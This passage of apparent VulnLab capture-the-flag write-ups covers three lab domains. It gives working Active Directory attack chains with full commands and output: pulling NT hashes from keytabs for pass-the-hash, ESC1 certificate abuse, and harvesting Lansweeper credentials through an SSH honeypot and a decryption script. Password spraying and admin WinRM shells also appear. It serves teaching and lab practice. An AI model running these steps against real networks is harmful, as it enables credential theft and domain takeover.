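    return buf[off + 2:off + 2 + n], off + 2 + n


def parse_keytab(data: bytes) -> List[KeytabEntry]:
    """Parse an MIT-format keytab (version 0x0502, all integers big-endian)."""
    if data[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version %r" % data[:2])
    off, entries = 2, []
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size <= 0:                      # negative size marks a deleted slot
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        realm, off = _counted_octets(data, off)
        comps = []
        for _ in range(ncomp):
            comp, off = _counted_octets(data, off)
            comps.append(comp.decode())
        name_type, timestamp, vno8 = struct.unpack_from(">IIB", data, off)
        off += 9
        enctype, klen = struct.unpack_from(">HH", data, off)
        off += 4
        key = data[off:off + klen]
        off += klen
        kvno = vno8
        if end - off >= 4:                 # optional 32-bit kvno written by newer kadmin
            (kvno,) = struct.unpack_from(">I", data, off)
        off = end
        entries.append(KeytabEntry("/".join(comps) + "@" + realm.decode(),
                                   name_type, timestamp, kvno, enctype, key))
    return entries


def nt_hash_from_keytab(entries) -> Optional[str]:
    """The rc4-hmac key IS the account's NT hash (RFC 4757: MD4 of the UTF-16LE
    password), so it can be passed straight to -hashes for pass-the-hash."""
    for e in entries:
        if e.enctype == 23:
            return e.key.hex()
    return None


def _entry(realm: bytes, comps: list, enctype: int, key: bytes, kvno: int = 2) -> bytes:
    """Serialise one keytab entry (used only to build the constructed sample below)."""
    body = struct.pack(">H", len(comps)) + struct.pack(">H", len(realm)) + realm
    for c in comps:
        body += struct.pack(">H", len(c)) + c
    body += struct.pack(">IIB", 1, 0x6673D000, kvno)
    body += struct.pack(">HH", enctype, len(key)) + key + struct.pack(">I", kvno)
    return struct.pack(">i", len(body)) + body


# Constructed sample: a MAIL01$ machine-account keytab with MADE-UP keys (not the box's).
SAMPLE_KEYTAB = (b"\x05\x02"
                 + _entry(b"HYBRID.VL", [b"MAIL01$"], 23, bytes(range(16)))
                 + _entry(b"HYBRID.VL", [b"MAIL01$"], 18, bytes(range(32))))


if __name__ == "__main__":
    for e in parse_keytab(SAMPLE_KEYTAB):
        print(e.principal, ENCTYPES.get(e.enctype, e.enctype), "kvno", e.kvno, e.key.hex())
    print("NT hash for pass-the-hash:", nt_hash_from_keytab(parse_keytab(SAMPLE_KEYTAB)))
```

Run it against a real file with `parse_keytab(open("krb5.keytab", "rb").read())`. The AES keys are just as useful (certipy and impacket accept `-aesKey`), but only the rc4-hmac entry doubles as the NT hash, which is why a keytab that still carries enctype 23 is the more dangerous thing to leave world-readable.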

Certipy: request a certificate as MAIL01$ with the administrator UPN (ESC1). -key-size 4096 is needed because the template enforces a 4096-bit minimum key length.

certipy-ad req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.200.5" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'DC01.hybrid.vl' -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'


┌──(puck㉿kali)-[~/vulnlab/hybrid]
certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.200.5      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

.

┌──(puck㉿kali)-[~/vulnlab/hybrid]
evil-winrm -i hybrid.vl -u 'Administrator' -H '60<REDACTED>dc' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hybrid\administrator

vulnlab-sweep

vulnlab sweep

a medium windows machine

tools used : crackmapexec , bloodhound-python , sshesame , evil-winrm

nmap scan

# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128
Nmap scan report for 10.10.80.128
Host is up (0.022s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
5357/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds

Enumerate

SMB enumeration as Guest, with RID brute-forcing to get the user list

┌──(puck㉿kali)-[~/vulnlab/sweep]
crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.80.128    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.80.128    445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.80.128    445    INVENTORY        [+] Enumerated shares
SMB         10.10.80.128    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.80.128    445    INVENTORY        -----           -----------     ------
SMB         10.10.80.128    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.80.128    445    INVENTORY        C$                              Default share
SMB         10.10.80.128    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.80.128    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.80.128    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.80.128    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.80.128    445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.80.128    445    INVENTORY        [+] Brute forcing RIDs
SMB         10.10.80.128    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

Build a user list from the RID brute-force output (only SidTypeUser entries) and spray it with username-as-password. --no-bruteforce pairs each user with the password on the same line instead of trying every combination; this yields intern:intern.

grep SidTypeUser allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
crackmapexec smb sweep.vl -u users.txt -p users.txt --no-bruteforce --continue-on-success --shares

Bloodhound Enum

┌──(puck㉿kali)-[~/vulnlab/sweep]
bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip    
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240617132345_bloodhound.zip

Log in to the Lansweeper web UI at http://sweep.vl:81/ as intern. Under Scanning -> Scanning credentials you can see which saved credentials are in use; under Scanning -> Scanning targets add an IP range target that contains your VulnLab VPN IP and map the saved credentials to it. Lansweeper will then scan our host and try to authenticate to it with those credentials.

On the Kali machine run an SSH honeypot to catch that login. I used sshesame; the only thing that needs changing in sshesame.yaml is the listen address, in my case:

listen_address: 10.8.2.138:22

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ ./sshesame-linux-amd64 --config sshesame.yaml
INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame"
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected
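Added example (my code, not part of the write-up or of sshesame): parse the honeypot's log lines into per-connection records so the captured credential, the client banner and any commands the scanner tried are pulled out automatically instead of by eye. The sample lines are constructed in the log format shown above; the password in them is made up.

```python
import re
from collections import defaultdict

# Constructed sample in sshesame's log format (password is made up, not the box's).
SAMPLE_LOG = """\
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "Example-Pa55" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected
"""

# "date time [ip:port] " prefix shared by every per-connection line.
_PREFIX = r"^\S+ \S+ \[(?P<src>[^\]]+)\] "
AUTH_RE = re.compile(_PREFIX + r'authentication for user "(?P<user>[^"]*)" with password "(?P<pw>[^"]*)" accepted$')
BANNER_RE = re.compile(_PREFIX + r'connection with client version "(?P<banner>[^"]*)" established$')
CMD_RE = re.compile(_PREFIX + r'\[channel \d+\] command "(?P<cmd>[^"]*)" requested$')


def harvest(log_text: str) -> dict:
    """Group accepted credentials, client banner and requested commands per source socket.

    Connections that never get past 'without credentials rejected' (the scanner's
    'none' auth probe) produce no record, so the result only holds real hits.
    """
    sessions = defaultdict(lambda: {"creds": set(), "banner": None, "commands": []})
    for line in log_text.splitlines():
        if m := AUTH_RE.match(line):
            sessions[m["src"]]["creds"].add((m["user"], m["pw"]))
        elif m := BANNER_RE.match(line):
            sessions[m["src"]]["banner"] = m["banner"]
        elif m := CMD_RE.match(line):
            sessions[m["src"]]["commands"].append(m["cmd"])
    return dict(sessions)


def captured_credentials(sessions: dict) -> list:
    """Flatten to (source_ip, user, password, client_banner) tuples, one per credential."""
    out = []
    for src, s in sessions.items():
        ip = src.rsplit(":", 1)[0]
        for user, pw in sorted(s["creds"]):
            out.append((ip, user, pw, s["banner"]))
    return out


if __name__ == "__main__":
    for row in captured_credentials(harvest(SAMPLE_LOG)):
        print("%s  %s:%s  (%s)" % row)
```

The banner is worth keeping: `SSH-2.0-RebexSSH_…` identifies the client library, so the same parser run on a production honeypot tells you which internal scanner is handing its password to arbitrary hosts.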

Log in to http://sweep.vl:81/Default.aspx as svc_inventory_lnx, which has more privileges in Lansweeper than intern.

From here you can continue with those extra privileges in the web UI, which gets simpler after adding svc_inventory_lnx to the "Lansweeper Admins" group.

The unintended, quicker way is to decrypt Lansweeper's stored scanning credentials directly: https://github.com/Yeeb1/SharpLansweeperDecrypt

But first, as BloodHound suggests (svc_inventory_lnx has full control over the "Lansweeper Admins" group):

Full control of a group allows you to directly modify group membership of the group.

Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:

┌──(puck㉿kali)-[~/vulnlab/sweep]
net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
Password for [SWEEP\svc_inventory_lnx]:

then Win-RM to the box

┌──(puck㉿kali)-[~/vulnlab/sweep]
evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED>' 

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1
                                        
Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1
                                        
Data: 5700 bytes of 5700 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED>
Inventory Linux   svc_inventory_lnx       0|5<REDACTED>

The decrypted svc_inventory_win password works over WinRM, and that account is an administrator on the box:

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>


vulnlab-sendai

vulnlab sendai

a medium windows machine

enum

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --users --shares 
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Enumerated shares
SMB         dc.sendai.vl    445    DC               Share           Permissions     Remark
SMB         dc.sendai.vl    445    DC               -----           -----------     ------
SMB         dc.sendai.vl    445    DC               ADMIN$                          Remote Admin
SMB         dc.sendai.vl    445    DC               C$                              Default share
SMB         dc.sendai.vl    445    DC               config                          
SMB         dc.sendai.vl    445    DC               IPC$            READ            Remote IPC
SMB         dc.sendai.vl    445    DC               NETLOGON                        Logon server share 
SMB         dc.sendai.vl    445    DC               sendai          READ            company share
SMB         dc.sendai.vl    445    DC               SYSVOL                          Logon server share 
SMB         dc.sendai.vl    445    DC               Users           READ            
SMB         dc.sendai.vl    445    DC               [-] Error enumerating domain users using dc ip dc.sendai.vl: NTLM needs domain\username and a password
SMB         dc.sendai.vl    445    DC               [*] Trying with SAMRPC protocol

.

rid-brute

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --rid-brute 10000
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Brute forcing RIDs
SMB         dc.sendai.vl    445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               500: SENDAI\Administrator (SidTypeUser)
SMB         dc.sendai.vl    445    DC               501: SENDAI\Guest (SidTypeUser)
SMB         dc.sendai.vl    445    DC               502: SENDAI\krbtgt (SidTypeUser)
SMB         dc.sendai.vl    445    DC               512: SENDAI\Domain Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               513: SENDAI\Domain Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               514: SENDAI\Domain Guests (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               515: SENDAI\Domain Computers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               516: SENDAI\Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               517: SENDAI\Cert Publishers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               518: SENDAI\Schema Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               525: SENDAI\Protected Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               526: SENDAI\Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1000: SENDAI\DC$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1104: SENDAI\sqlsvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1105: SENDAI\websvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1107: SENDAI\staff (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1112: SENDAI\Susan.Harper (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1117: SENDAI\Jason.Brady (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1128: SENDAI\ca-operators (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1129: SENDAI\admsvc (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1131: SENDAI\support (SidTypeGroup)
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt

Spray an empty password against the list. Two things in the output need reading carefully. First, the cut/awk pipeline above keeps only the first word of each name, so multi-word groups come through as "Domain", "Cert", "Read-only" and so on, and stray lines in allusers.txt produce the two empty names at the end. Second, those bogus names come back [+] only because the Guest account is enabled (note Guest itself is [+]), which makes the DC map unknown usernames to Guest; a [+] here is a guest-equivalent session, not a found password. The result that matters is STATUS_PASSWORD_MUST_CHANGE for Elliot.Yates and Thomas.Powell: the empty password is correct but expired, so those accounts become usable as soon as the password is changed.

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u users.txt -p '' --continue-on-success
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Guest: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cert: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Schema: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Group: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Read-only: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cloneable: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Protected: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Key: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\RAS: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Allowed: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Denied: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\DC$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsAdmins: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsUpdateProxy: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\SQLServer2005SQLBrowserUser$DC: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\websvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\staff: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE 
